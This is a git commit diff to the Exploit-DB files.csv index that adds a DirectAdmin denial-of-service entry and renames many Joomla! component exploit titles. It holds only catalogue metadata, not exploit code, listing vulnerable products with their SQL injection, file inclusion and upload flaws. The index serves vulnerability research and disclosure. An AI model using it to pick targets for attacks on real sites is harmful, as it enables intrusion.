DB: 2017-01-10
5 new exploits DirectAdmin 1.50.1 - Denial of Service Joomla! Component 'com_menu' - SQL Injection Joomla! Component com_menu - SQL Injection Joomla! Component 'com_pcchess' - Local File Inclusion Joomla! Component 'com_huruhelpdesk' - SQL Injection Joomla! Component com_pcchess - Local File Inclusion Joomla! Component huruhelpdesk - SQL Injection Joomla! Component 'com_ca' - SQL Injection Joomla! Component com_ca - SQL Injection Joomla! Component 'com_education_classess' - SQL Injection Joomla! Component education - SQL Injection Joomla! Component 'com_Flashgames' - Local File Inclusion Joomla! Component FlashGames 1.5.0 - Local File Inclusion Joomla! Component 'com_cvmaker' - Local File Inclusion Joomla! Component 'com_myfiles' - Local File Inclusion Joomla! Component CV Maker 1.0 - Local File Inclusion Joomla! Component My Files 1.0 - Local File Inclusion Joomla! Component 'com_joommail' - Local File Inclusion Joomla! Component 'com_memory' - Local File Inclusion Joomla! Component JoomMail 1.0 - Local File Inclusion Joomla! Component Memory Book 1.2 - Local File Inclusion Joomla! Component 'com_diary' - Local File Inclusion Joomla! Component Digital Diary 1.5.0 - Local File Inclusion Joomla! Component 'com_jdrugstopics' - SQL Injection Joomla! Component com_jdrugstopics - SQL Injection Joomla! Component 'com_flexicontent' - Local File Joomla! Component FLEXIcontent 1.5 - Local File Inclusion Joomla! Component 'com_delicious' - Local File Inclusion Joomla! Component Delicious Bookmarks 0.0.1 - Local File Inclusion Joomla! Component 'com_manager' 1.5.3 - 'id' Parameter SQL Injection Joomla! Component com_manager 1.5.3 - 'id' Parameter SQL Injection Joomla! Component 'com_pandafminigames' - SQL Injection Joomla! Component com_pandafminigames - SQL Injection Joomla! Component 'com_caddy' - Exploit Joomla! Component com_caddy - Exploit Joomla! Component 'com_jesectionfinder' - Arbitrary File Upload Joomla! Component com_jesectionfinder - Arbitrary File Upload Joomla! Component 'com_camp' - SQL Injection Joomla! Component com_camp - SQL Injection Joomla! Component 'com_crowdsource' - SQL Injection Joomla! Component 'com_event' - Multiple Vulnerabilities Joomla! Component com_crowdsource - SQL Injection Joomla! Component com_event - Multiple Vulnerabilities Joomla! Component 'com_event' - SQL Injection Joomla! Component com_event - SQL Injection Joomla! Component 'com_packages' - SQL Injection Joomla! Component com_packages - SQL Injection Joomla! Component 'com_jepoll' - 'pollid' Parameter SQL Injection Joomla! Component JE Poll - 'pollid' Parameter SQL Injection Joomla! Component 'com_chronoconnectivity' - Blind SQL Injection Joomla! Component 'com_chronocontact' - Blind SQL Injection Joomla! Component ChronoConnectivity - Blind SQL Injection Joomla! Component ChronoForms - Blind SQL Injection Joomla! Component 'com_lead' - SQL Injection Joomla! Component com_lead - SQL Injection Joomla! Component 'com_cinema' - SQL Injection Joomla! Component cinema - SQL Injection Joomla! Component 'com_jstore' - SQL Injection Joomla! Component 'com_jtickets' - SQL Injection Joomla! Component 'com_jcommunity' - SQL Injection Joomla! Component 'com_jmarket' - SQL Injection Joomla! Component 'com_jsubscription' - SQL Injection Joomla! Component com_jstore - SQL Injection Joomla! Component com_jtickets - SQL Injection Joomla! Component com_jcommunity - SQL Injection Joomla! Component com_jmarket - SQL Injection Joomla! Component com_jsubscription - SQL Injection Joomla! Component 'com_jnewsletter' - SQL Injection Joomla! Component com_jnewsletter - SQL Injection Joomla! Component 'com_joomdocs' - Cross-Site Scripting Joomla! Component com_joomdocs - Cross-Site Scripting Joomla! Component 'com_community' - Persistent Cross-Site Scripting Joomla! Component 'com_jomestate' - Remote File Inclusion Joomla! Component com_community - Persistent Cross-Site Scripting Joomla! Component com_jomestate - Remote File Inclusion Joomla! Component 'com_jejob' - Local File Inclusion Joomla! Component com_jejob - Local File Inclusion Joomla! Component 'com_dateconverter' 0.1 - SQL Injection Joomla! Component com_dateconverter 0.1 - SQL Injection Joomla! Component 'com_phocagallery' - SQL Injection Joomla! Component Phoca Gallery 2.7.3 - SQL Injection Joomla! Component 'com_jpodium' - SQL Injection Joomla! Component JPodium 2.7.3 - SQL Injection Joomla! Component 'com_jomtube' - 'user_id' Parameter Blind SQL Injection Joomla! Component com_jomtube - 'user_id' Parameter Blind SQL Injection Joomla! Component 'com_myhome' - Blind SQL Injection Joomla! Component 'com_mysms' - Arbitrary File Upload Joomla! Component MyHome - Blind SQL Injection Joomla! Component MySMS - Arbitrary File Upload Joomla! Component 'com_iproperty' - SQL Injection Joomla! Component com_iproperty - SQL Injection Joomla! Component 'com_itarmory' - SQL Injection Joomla! Component com_itarmory - SQL Injection Joomla! Component 'com_neorecruit' 1.4 - SQL Injection Joomla! Component NeoRecruit 1.4 - SQL Injection Joomla! Component 'com_equipment' - SQL Injection Joomla! Component com_equipment - SQL Injection Joomla! Component 'com_Fabrik' - SQL Injection Joomla! Component 'com_extcalendar' - Blind SQL Injection Joomla! Component Fabrik - SQL Injection Joomla! Component com_extcalendar - Blind SQL Injection Joomla! Component 'com_jejob' - SQL Injection Joomla! Component JE Job - SQL Injection Joomla! Component 'com_jfuploader' < 2.12 - Arbitrary File Upload Joomla! Component com_jfuploader < 2.12 - Arbitrary File Upload Joomla! Component 'com_connect' - Local File Inclusion Joomla! Component 'com_dcnews' - Local File Inclusion Joomla! Component com_connect - Local File Inclusion Joomla! Component com_dcnews - Local File Inclusion Joomla! Component 'com_clan' - SQL Injection Joomla! Component com_clan - SQL Injection Joomla! Component 'com_clanlist' - SQL Injection Joomla! Component com_clanlist - SQL Injection Joomla! Component 'com_markt' - SQL Injection Joomla! Component 'com_img' - Local File Inclusion Joomla! Component com_markt - SQL Injection Joomla! Component com_img - Local File Inclusion Joomla! Component 'com_ccboard' 1.2-RC - Multiple Vulnerabilities Joomla! Component CCBoard 1.2-RC - Multiple Vulnerabilities Joomla! Component 'com_maianmedia' - SQL Injection Joomla! Component com_maianmedia - SQL Injection Joomla! Component 'com_idoblog' - SQL Injection Joomla! Component com_idoblog - SQL Injection Joomla! Component 'com_people' 1.0.0 - SQL Injection Joomla! Component People 1.0.0 - SQL Injection Joomla! Component 'com_people' 1.0.0 - Local File Inclusion Joomla! Component com_people 1.0.0 - Local File Inclusion Joomla! Component 'com_jce' - Blind SQL Injection Joomla! Component joomlacontenteditor - Blind SQL Injection Joomla! Component 'com_hello' - SQL Injection Joomla! Component com_hello - SQL Injection Joomla! Component 'com_jdownloads' 1.0 - Arbitrary File Upload Joomla! Component jDownloads 1.0 - Arbitrary File Upload Joomla! Component 'com_jesubmit' - Local File Inclusion Joomla! Component JE Story Submit - Local File Inclusion Joomla! Component 'com_obSuggest' - Local File Inclusion Joomla! Component obSuggest - Local File Inclusion Joomla! Component 'com_jdirectory' - SQL Injection Joomla! Component com_jdirectory - SQL Injection Joomla! Component 'com_esearch' - SQL Injection Joomla! Component Search 3.0.0 - SQL Injection Joomla! Component 'com_joomtouch' - Local File Inclusion Joomla! Component JoomTouch 1.0.2 - Local File Inclusion Joomla! Component 'com_jce' 2.0.10 - Multiple Vulnerabilities Joomla! Component joomlacontenteditor 2.0.10 - Multiple Vulnerabilities Joomla! Component 'com_horses' - 'id' Parameter SQL Injection Joomla! Component com_horses - 'id' Parameter SQL Injection Joomla! Component 'com_galleryxml' 1.1 - SQL Injection / Local File Inclusion Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion Joomla! Component 'com_jigsaw' - 'Controller' Parameter Directory Traversal Joomla! Component com_jigsaw - 'Controller' Parameter Directory Traversal Joomla! Component 'com_fireboard' - 'Itemid' Parameter SQL Injection Joomla! Component com_fireboard - 'Itemid' Parameter SQL Injection Joomla! Component 'com_dirfrm' - Multiple SQL Injections Joomla! Component com_dirfrm - Multiple SQL Injections Joomla! Component 'com_catalogue' - SQL Injection / Local File Inclusion Joomla! Component Catalogue - SQL Injection / Local File Inclusion Joomla! Component 'com_jeformcr' - 'id' Parameter SQL Injection Joomla! Component 'com_jesectionfinder' - 'sf_id' Parameter SQL Injection Joomla! Component Jeformcr - 'id' Parameter SQL Injection Joomla! Component JExtensions Property Finder - 'sf_id' Parameter SQL Injection Joomla! Component 'com_mailto' - Multiple Cross-Site Scripting Vulnerabilities Joomla! Component com_mailto - Multiple Cross-Site Scripting Vulnerabilities Joomla! Component 'com_classified' - SQL Injection Joomla! Component Classified - SQL Injection Joomla! Component 'com_frontenduseraccess' - Local File Inclusion Joomla! Component com_frontenduseraccess - Local File Inclusion Joomla! Component 'com_clan_members' - 'id' Parameter SQL Injection Joomla! Component com_clan_members - 'id' Parameter SQL Injection Joomla! Component 'com_phocadownload' - Local File Inclusion Joomla! Component com_phocadownload - Local File Inclusion Joomla! Component 'com_cbcontact' - 'contact_id' Parameter SQL Injection Joomla! Component com_cbcontact - 'contact_id' Parameter SQL Injection Joomla! Component 'com_maplocator' - 'cid' Parameter SQL Injection Joomla! Component Map Locator - 'cid' Parameter SQL Injection Joomla! Component 'com_ccboard' - SQL Injection / Arbitrary File Upload Joomla! Component CCBoard - SQL Injection / Arbitrary File Upload Joomla! Component 'com_morfeoshow' - 'idm' Parameter SQL Injection Joomla! Component com_morfeoshow - 'idm' Parameter SQL Injection Joomla! Component 'com_jr_tfb' - 'Controller' Parameter Local File Inclusion Joomla! Component com_jr_tfb - 'Controller' Parameter Local File Inclusion Joomla! Component 'com_foto' - 'id_categoria' Parameter SQL Injection Joomla! Component 'com_juicy' - 'picId' Parameter SQL Injection Joomla! Component 'com_hospital' - SQL Injection Joomla! Component 'com_controller' - 'Itemid' Parameter SQL Injection Joomla! Component Foto - 'id_categoria' Parameter SQL Injection Joomla! Component Juicy Gallery - 'picId' Parameter SQL Injection Joomla! Component com_hospital - SQL Injection Joomla! Component Controller - 'Itemid' Parameter SQL Injection Joomla! Component 'com_newssearch' - SQL Injection Joomla! Component com_newssearch - SQL Injection Joomla! Component 'com_community' - 'userid' Parameter SQL Injection Joomla! Component com_community - 'userid' Parameter SQL Injection Joomla! Component 'com_biitatemplateshop' - 'groups' Parameter SQL Injection Joomla! Component Biitatemplateshop - 'groups' Parameter SQL Injection Joomla! Component 'com_expedition' - 'id' Parameter SQL Injection Joomla! Component com_expedition - 'id' Parameter SQL Injection Joomla! Component 'com_br' - 'state_id' Parameter SQL Injection Joomla! Component com_br - 'state_id' Parameter SQL Injection Joomla! Component 'com_caproductprices' - 'id' Parameter SQL Injection Joomla! Component com_caproductprices - 'id' Parameter SQL Injection Joomla! Component 'com_br' - 'Controller' Parameter Local File Inclusion Joomla! Component com_br - 'Controller' Parameter Local File Inclusion Joomla! Component 'com_full' - 'id' Parameter SQL Injection Joomla! Component Full - 'id' Parameter SQL Injection Joomla! Component 'com_boss' - 'Controller' Parameter Local File Inclusion Joomla! Component 'com_car' - Multiple SQL Injections Joomla! Component com_boss - 'Controller' Parameter Local File Inclusion Joomla! Component com_car - Multiple SQL Injections Joomla! Component 'com_bulkenquery' - 'Controller' Parameter Local File Inclusion Joomla! Component com_bulkenquery - 'Controller' Parameter Local File Inclusion Joomla! Component 'com_jesubmit' - 'index.php' Arbitrary File Upload Joomla! Component JE Story Submit - 'index.php' Arbitrary File Upload Joomla! Component 'com_motor' - 'cid' Parameter SQL Injection Joomla! Component com_motor - 'cid' Parameter SQL Injection Joomla! Component 'com_firmy' - 'Id' Parameter SQL Injection Joomla! Component 'com_crhotels' - 'catid' Parameter SQL Injection Joomla! Component com_firmy - 'Id' Parameter SQL Injection Joomla! Component com_crhotels - 'catid' Parameter SQL Injection Joomla! Component 'com_cmotour' - 'id' Parameter SQL Injection Joomla! Component com_cmotour - 'id' Parameter SQL Injection Joomla! Component 'com_bnf' - 'seccion_id' Parameter SQL Injection Joomla! Component com_bnf - 'seccion_id' Parameter SQL Injection Joomla! Component 'com_machine' - Multiple SQL Injections Joomla! Component Machine - Multiple SQL Injections Joomla! Component 'com_joomsport' - SQL Injection / Arbitrary File Upload Joomla! Component Joomsport - SQL Injection / Arbitrary File Upload Joomla! Component 'com_dv' - 'upload.php' Arbitrary File Upload Joomla! Component DentroVideo 1.2 - 'upload.php' Arbitrary File Upload Joomla! Component 'com_hwdvideoshare' - 'flash_upload.php' Arbitrary File Upload Joomla! Component hwdVideoShare - 'flash_upload.php' Arbitrary File Upload Joomla! Component 'com_maianmedia' - 'uploadhandler.php' Arbitrary File Upload Joomla! Component 'com_jcalpro' - SQL Injection Joomla! Component Maian Media - 'uploadhandler.php' Arbitrary File Upload Joomla! Component JCal Pro Calendar - SQL Injection Joomla! Component 'com_hello' - 'Controller' Parameter Local File Inclusion Joomla! Component com_hello - 'Controller' Parameter Local File Inclusion Joomla! Component 'com_odudeprofile' - 'profession' Parameter SQL Injection Joomla! Component Odudeprofile 2.8 - 'profession' Parameter SQL Injection Joomla! Component 'com_civicrm' - Multiple Arbitrary File Upload Vulnerabilities Joomla! Component CiviCRM - Multiple Arbitrary File Upload Vulnerabilities Joomla! Component 'com_parcoauto' - 'idVeicolo' Parameter SQL Injection Joomla! Component Parcoauto - 'idVeicolo' Parameter SQL Injection Joomla! Component 'com_jvideoclip' - 'uid' Parameter SQL Injection Joomla! Component JVideoClip 1.5.1 - 'uid' Parameter SQL Injection Joomla! Component 'com_maian15' - 'name' Parameter Arbitrary File Upload Joomla! Component Maian15 - 'name' Parameter Arbitrary File Upload Joomla! Component 'com_inneradmission' - 'index.php' SQL Injection Joomla! Component Inneradmission - 'index.php' SQL Injection Joomla! Component 'com_easy_youtube_gallery' 1.0.2 - SQL Injection Joomla! Component Easy Youtube Gallery 1.0.2 - SQL Injection Joomla! Component 'com_payplans' 3.3.6 - SQL Injection Joomla! Component com_payplans 3.3.6 - SQL Injection Joomla! Component 'com_enmasse' 5.1 < 6.4 - SQL Injection Joomla! Component com_enmasse 5.1 < 6.4 - SQL Injection Joomla! Component 'com_bt_media' - SQL Injection Joomla! Component com_bt_media 1.0 - SQL Injection Joomla! Component 'com_guru' - SQL Injection Joomla! Component Guru Pro - SQL Injection DirectAdmin 1.50.1 - Denial of Service Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting My Link Trader 1.1 - Authentication Bypass My Php Dating 2.0 - 'path' Parameter SQL Injection My Php Dating 2.0 - 'id' Parameter SQL Injection
This commit is contained in:
Offensive Security
parent
a1c336773a
commit
574c0f2df8
8 changed files with 235 additions and 132 deletions
264
files.csv
264
files.csv
|
|
@ -5334,6 +5334,7 @@ id,file,description,date,author,platform,type,port
|
|||
40965,platforms/windows/dos/40965.py,"FTPShell Server 6.36 - '.csv' Local Denial of Service",2016-12-26,"sultan albalawi",windows,dos,0
|
||||
40985,platforms/linux/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,linux,dos,0
|
||||
40994,platforms/multiple/dos/40994.html,"Brave Browser 1.2.16/1.9.56 - Address Bar URL Spoofing",2017-01-08,"Aaditya Purani",multiple,dos,0
|
||||
40996,platforms/php/dos/40996.txt,"DirectAdmin 1.50.1 - Denial of Service",2017-01-08,"IeDb ir",php,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
|
@ -22784,7 +22785,7 @@ id,file,description,date,author,platform,type,port
|
|||
12006,platforms/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde - Arbitrary File Upload",2010-04-01,indoushka,php,webapps,0
|
||||
12007,platforms/php/webapps/12007.txt,"SimpNews 2.16.2 - Multiple SQL Injections",2010-04-01,NoGe,php,webapps,0
|
||||
12009,platforms/php/webapps/12009.html,"CMS Made Simple 1.7 - Cross-Site Request Forgery",2010-04-02,"pratul agrawal",php,webapps,0
|
||||
12015,platforms/php/webapps/12015.txt,"Joomla! Component 'com_menu' - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
|
||||
12015,platforms/php/webapps/12015.txt,"Joomla! Component com_menu - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
|
||||
12016,platforms/php/webapps/12016.txt,"Joomla! Component com_ops - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
|
||||
12017,platforms/php/webapps/12017.txt,"Joomla! Component com_football - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
|
||||
12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - popup.php / counter.php Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0
|
||||
|
|
@ -22854,8 +22855,8 @@ id,file,description,date,author,platform,type,port
|
|||
12118,platforms/php/webapps/12118.txt,"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0
|
||||
12120,platforms/php/webapps/12120.txt,"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0
|
||||
12121,platforms/php/webapps/12121.txt,"Joomla! Component JA Voice 2.0 - Local File Inclusion",2010-04-09,kaMtiEz,php,webapps,0
|
||||
12123,platforms/php/webapps/12123.txt,"Joomla! Component 'com_pcchess' - Local File Inclusion",2010-04-09,team_elite,php,webapps,0
|
||||
12124,platforms/php/webapps/12124.txt,"Joomla! Component 'com_huruhelpdesk' - SQL Injection",2010-04-09,bumble_be,php,webapps,0
|
||||
12123,platforms/php/webapps/12123.txt,"Joomla! Component com_pcchess - Local File Inclusion",2010-04-09,team_elite,php,webapps,0
|
||||
12124,platforms/php/webapps/12124.txt,"Joomla! Component huruhelpdesk - SQL Injection",2010-04-09,bumble_be,php,webapps,0
|
||||
12128,platforms/php/webapps/12128.txt,"GarageSales - Arbitrary File Upload",2010-04-09,saidinh0,php,webapps,0
|
||||
12132,platforms/php/webapps/12132.pl,"Joomla! Component Agenda Address Book 1.0.1 - 'id' Parameter SQL Injection",2010-04-09,v3n0m,php,webapps,0
|
||||
12133,platforms/multiple/webapps/12133.txt,"Asset Manager 1.0 - Arbitrary File Upload",2010-04-09,"Shichemt Alen and NeT_Own3r",multiple,webapps,0
|
||||
|
|
@ -22863,7 +22864,7 @@ id,file,description,date,author,platform,type,port
|
|||
12135,platforms/php/webapps/12135.txt,"mygamingladder MGL Combo System 7.5 - SQL Injection",2010-04-10,"Easy Laster",php,webapps,0
|
||||
12136,platforms/php/webapps/12136.txt,"Joomla! Component Real Estate Property 3.1.22-03 - 'aid' Parameter SQL Injection",2010-04-10,c4uR,php,webapps,0
|
||||
12137,platforms/php/webapps/12137.txt,"Joomla! Component allvideos - Blind SQL Injection",2010-04-10,bumble_be,php,webapps,0
|
||||
12138,platforms/php/webapps/12138.txt,"Joomla! Component 'com_ca' - SQL Injection",2010-04-10,DigitALL,php,webapps,0
|
||||
12138,platforms/php/webapps/12138.txt,"Joomla! Component com_ca - SQL Injection",2010-04-10,DigitALL,php,webapps,0
|
||||
12139,platforms/php/webapps/12139.txt,"Kiasabz Article News CMS Magazine - SQL Injection",2010-04-10,indoushka,php,webapps,0
|
||||
12140,platforms/php/webapps/12140.php,"xBtiTracker - SQL Injection",2010-04-11,InATeam,php,webapps,0
|
||||
12141,platforms/php/webapps/12141.txt,"MediaInSpot CMS - Local File Inclusion (1)",2010-04-11,"Amoo Arash",php,webapps,0
|
||||
|
|
@ -22877,7 +22878,7 @@ id,file,description,date,author,platform,type,port
|
|||
12149,platforms/php/webapps/12149.txt,"Joomla! Component 'com_spsnewsletter' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12150,platforms/php/webapps/12150.txt,"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12151,platforms/php/webapps/12151.txt,"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
|
||||
12153,platforms/php/webapps/12153.txt,"Joomla! Component 'com_education_classess' - SQL Injection",2010-04-11,bumble_be,php,webapps,0
|
||||
12153,platforms/php/webapps/12153.txt,"Joomla! Component education - SQL Injection",2010-04-11,bumble_be,php,webapps,0
|
||||
12155,platforms/php/webapps/12155.txt,"AuroraGPT 4.0 - Remote Code Execution",2010-04-11,"Amoo Arash",php,webapps,0
|
||||
12157,platforms/php/webapps/12157.txt,"OnePC mySite Management Software - SQL Injection",2010-04-11,Valentin,php,webapps,0
|
||||
12158,platforms/php/webapps/12158.py,"Elite Gaming Ladders 3.5 - (match) SQL Injection",2010-04-11,"Easy Laster",php,webapps,0
|
||||
|
|
@ -22889,23 +22890,23 @@ id,file,description,date,author,platform,type,port
|
|||
12166,platforms/php/webapps/12166.txt,"Joomla! Component Web TV 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12167,platforms/php/webapps/12167.txt,"Joomla! Component Horoscope 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12168,platforms/php/webapps/12168.txt,"Joomla! Component Arcade Games 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12169,platforms/php/webapps/12169.txt,"Joomla! Component 'com_Flashgames' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12169,platforms/php/webapps/12169.txt,"Joomla! Component FlashGames 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12170,platforms/php/webapps/12170.txt,"Joomla! Component Address Book 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12171,platforms/php/webapps/12171.txt,"Joomla! Component Advertising 0.25 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12172,platforms/php/webapps/12172.txt,"Joomla! Component 'com_cvmaker' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12173,platforms/php/webapps/12173.txt,"Joomla! Component 'com_myfiles' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12172,platforms/php/webapps/12172.txt,"Joomla! Component CV Maker 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12173,platforms/php/webapps/12173.txt,"Joomla! Component My Files 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12174,platforms/php/webapps/12174.txt,"Joomla! Component Online Exam 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12175,platforms/php/webapps/12175.txt,"Joomla! Component 'com_joommail' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12176,platforms/php/webapps/12176.txt,"Joomla! Component 'com_memory' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12175,platforms/php/webapps/12175.txt,"Joomla! Component JoomMail 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12176,platforms/php/webapps/12176.txt,"Joomla! Component Memory Book 1.2 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12177,platforms/php/webapps/12177.txt,"Joomla! Component Online Market 2.x - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12178,platforms/php/webapps/12178.txt,"Joomla! Component 'com_diary' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12178,platforms/php/webapps/12178.txt,"Joomla! Component Digital Diary 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12179,platforms/php/webapps/12179.txt,"FusionForge 5.0 - Multiple Remote File Inclusion",2010-04-12,cr4wl3r,php,webapps,0
|
||||
12180,platforms/php/webapps/12180.txt,"Joomla! Component 'com_worldrates' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12181,platforms/php/webapps/12181.txt,"Joomla! Component 'com_record' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12182,platforms/php/webapps/12182.txt,"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
|
||||
12183,platforms/php/webapps/12183.txt,"Joomla! Component 'com_jdrugstopics' - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0
|
||||
12183,platforms/php/webapps/12183.txt,"Joomla! Component com_jdrugstopics - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0
|
||||
12184,platforms/php/webapps/12184.txt,"Joomla! Component SermonSpeaker - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0
|
||||
12185,platforms/php/webapps/12185.txt,"Joomla! Component 'com_flexicontent' - Local File",2010-04-12,eidelweiss,php,webapps,0
|
||||
12185,platforms/php/webapps/12185.txt,"Joomla! Component FLEXIcontent 1.5 - Local File Inclusion",2010-04-12,eidelweiss,php,webapps,0
|
||||
12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 Beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-12,cr4wl3r,php,webapps,0
|
||||
12190,platforms/php/webapps/12190.txt,"Joomla! Component Jvehicles 1.0/2.0 - 'aid' Parameter SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0
|
||||
12191,platforms/php/webapps/12191.txt,"Joomla! Component JP Jobs 1.2.0 - 'id' Parameter SQL Injection",2010-04-13,v3n0m,php,webapps,0
|
||||
|
|
@ -22934,7 +22935,7 @@ id,file,description,date,author,platform,type,port
|
|||
12234,platforms/php/webapps/12234.txt,"Joomla! Component Media Mall Factory 1.0.4 - Blind SQL Injection",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12235,platforms/php/webapps/12235.txt,"Joomla! Component Love Factory 1.3.4 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12236,platforms/php/webapps/12236.txt,"Joomla! Component JA Comment - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12237,platforms/php/webapps/12237.txt,"Joomla! Component 'com_delicious' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12237,platforms/php/webapps/12237.txt,"Joomla! Component Delicious Bookmarks 0.0.1 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12238,platforms/php/webapps/12238.txt,"Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12239,platforms/php/webapps/12239.txt,"Joomla! Component BeeHeard 1.0 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0
|
||||
|
|
@ -22945,14 +22946,14 @@ id,file,description,date,author,platform,type,port
|
|||
12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - 'FCKeditor' Arbitrary File Upload",2010-04-15,eidelweiss,php,webapps,0
|
||||
12254,platforms/php/webapps/12254.txt,"FCKEditor Core - (FileManager test.html) Arbitrary File Upload (1)",2010-04-16,Mr.MLL,php,webapps,0
|
||||
12256,platforms/php/webapps/12256.txt,"ilchClan 1.0.5B - SQL Injection",2010-04-16,"Easy Laster",php,webapps,0
|
||||
12257,platforms/php/webapps/12257.txt,"Joomla! Component 'com_manager' 1.5.3 - 'id' Parameter SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
|
||||
12257,platforms/php/webapps/12257.txt,"Joomla! Component com_manager 1.5.3 - 'id' Parameter SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
|
||||
12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting",2010-04-16,JosS,php,webapps,0
|
||||
12262,platforms/php/webapps/12262.php,"Zyke CMS 1.1 - (Authentication Bypass) SQL Injection",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0
|
||||
12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password)",2010-04-16,EL-KAHINA,php,webapps,0
|
||||
12267,platforms/php/webapps/12267.txt,"WebAdmin - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
|
||||
12268,platforms/php/webapps/12268.txt,"Uploader 0.7 - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
|
||||
12269,platforms/php/webapps/12269.txt,"Joomla! Component JoltCard 1.2.1 - SQL Injection",2010-04-16,Valentin,php,webapps,0
|
||||
12270,platforms/php/webapps/12270.txt,"Joomla! Component 'com_pandafminigames' - SQL Injection",2010-04-16,Valentin,php,webapps,0
|
||||
12270,platforms/php/webapps/12270.txt,"Joomla! Component com_pandafminigames - SQL Injection",2010-04-16,Valentin,php,webapps,0
|
||||
12272,platforms/php/webapps/12272.txt,"PHP RapidKill Pro 5.x - Arbitrary File Upload",2010-04-17,DigitALL,php,webapps,0
|
||||
12276,platforms/php/webapps/12276.txt,"Redaxo 4.2.1 - Remote File Inclusion",2010-04-18,eidelweiss,php,webapps,0
|
||||
12277,platforms/php/webapps/12277.txt,"Openscrutin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-18,cr4wl3r,php,webapps,0
|
||||
|
|
@ -22991,7 +22992,7 @@ id,file,description,date,author,platform,type,port
|
|||
12333,platforms/php/webapps/12333.txt,"cms (id) 5.0 - SQL Injection",2010-04-22,spykit,php,webapps,0
|
||||
12338,platforms/php/webapps/12338.txt,"Cacti 0.8.7e - SQL Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0
|
||||
12339,platforms/php/webapps/12339.txt,"Cacti 0.8.7e - OS Command Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0
|
||||
